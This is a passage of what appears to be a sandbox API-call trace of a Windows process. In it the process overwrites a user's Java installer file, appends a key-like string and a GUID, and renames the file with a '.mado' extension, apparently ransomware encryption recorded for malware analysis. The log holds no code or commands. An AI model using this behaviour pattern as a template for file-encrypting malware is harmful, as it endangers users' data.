CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0207.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0207.067] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0207.067] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0207.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0207.067] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0207.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0207.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25810) returned 0x3b87c98 [0207.067] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0207.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87328 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cf8 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87370 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d10 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d40 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d88 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d58 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0207.068] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0207.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d40 | out: hHeap=0x2c0000) returned 1 [0207.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d58 | out: hHeap=0x2c0000) returned 1 [0207.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d88 | out: hHeap=0x2c0000) returned 1 [0207.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0207.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d88 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79d58 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79d40 [0207.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0207.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b75a80 [0207.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0207.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0207.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0207.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b75b98 [0207.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0207.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0207.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a80 | out: hHeap=0x2c0000) returned 1 [0207.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d58 | out: hHeap=0x2c0000) returned 1 [0207.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0207.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d40 | out: hHeap=0x2c0000) returned 1 [0207.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0207.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0207.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d88 | out: hHeap=0x2c0000) returned 1 [0207.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0207.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0207.069] GetCurrentThreadId () returned 0x600 [0207.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b817b0 [0207.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b7b418 [0207.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0207.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0207.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0207.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0207.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0207.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b81ac8 [0207.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.070] GetCurrentThreadId () returned 0x600 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b818b8 [0207.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b81bd0 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d88 [0207.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d40 [0207.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0207.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0207.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0207.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0207.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0207.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d58 [0207.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0207.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0207.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0207.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d28 [0207.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0207.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79da0 [0207.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0207.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0207.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d70 [0207.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79db8 [0207.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0207.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0207.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0207.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0207.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0207.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0207.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d40 | out: hHeap=0x2c0000) returned 1 [0207.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d40 [0207.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0207.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d88 | out: hHeap=0x2c0000) returned 1 [0207.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b75a80 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79db8 | out: hHeap=0x2c0000) returned 1 [0207.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0207.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b75cb0 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0207.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b75968 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d40 | out: hHeap=0x2c0000) returned 1 [0207.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a80 | out: hHeap=0x2c0000) returned 1 [0207.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b819c0 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b818b8 | out: hHeap=0x2c0000) returned 1 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b819c0 | out: hHeap=0x2c0000) returned 1 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75cb0 | out: hHeap=0x2c0000) returned 1 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d70 | out: hHeap=0x2c0000) returned 1 [0207.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79da0 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d58 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d28 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81ac8 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d10 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87370 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81bd0 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b98 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0207.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0207.073] WriteFile (in: hFile=0x63c, lpBuffer=0x3b87c98*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b87c98*, lpNumberOfBytesWritten=0x39cfb14*=0x25800, lpOverlapped=0x0) returned 1 [0207.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87c98 | out: hHeap=0x2c0000) returned 1 [0207.074] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xdd600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.074] WriteFile (in: hFile=0x63c, lpBuffer=0x3b817b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b817b0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0207.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b817b0 | out: hHeap=0x2c0000) returned 1 [0207.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0207.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0207.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0207.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0207.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0207.074] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0207.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0207.074] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0207.074] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0207.074] CloseHandle (hObject=0x63c) returned 1 [0207.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77b90 [0207.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b7b950 [0207.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77b90 | out: hHeap=0x2c0000) returned 1 [0207.085] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi.mado")) returned 1 [0207.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.086] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a67c8 | out: hHeap=0x2c0000) returned 1 [0207.087] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68d26e60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xdd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45.msi", cAlternateFileName="JRE170~1.MSI")) returned 0 [0207.087] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0207.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef4b8 | out: hHeap=0x2c0000) returned 1 [0207.087] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292de0 [0207.087] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292eb8 | out: hHeap=0x2c0000) returned 1 [0207.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292eb8 | out: hHeap=0x2c0000) returned 1 [0207.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292eb8 | out: hHeap=0x2c0000) returned 1 [0207.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292eb8 | out: hHeap=0x2c0000) returned 1 [0207.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292eb8 | out: hHeap=0x2c0000) returned 1 [0207.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292eb8 | out: hHeap=0x2c0000) returned 1 [0207.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0207.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 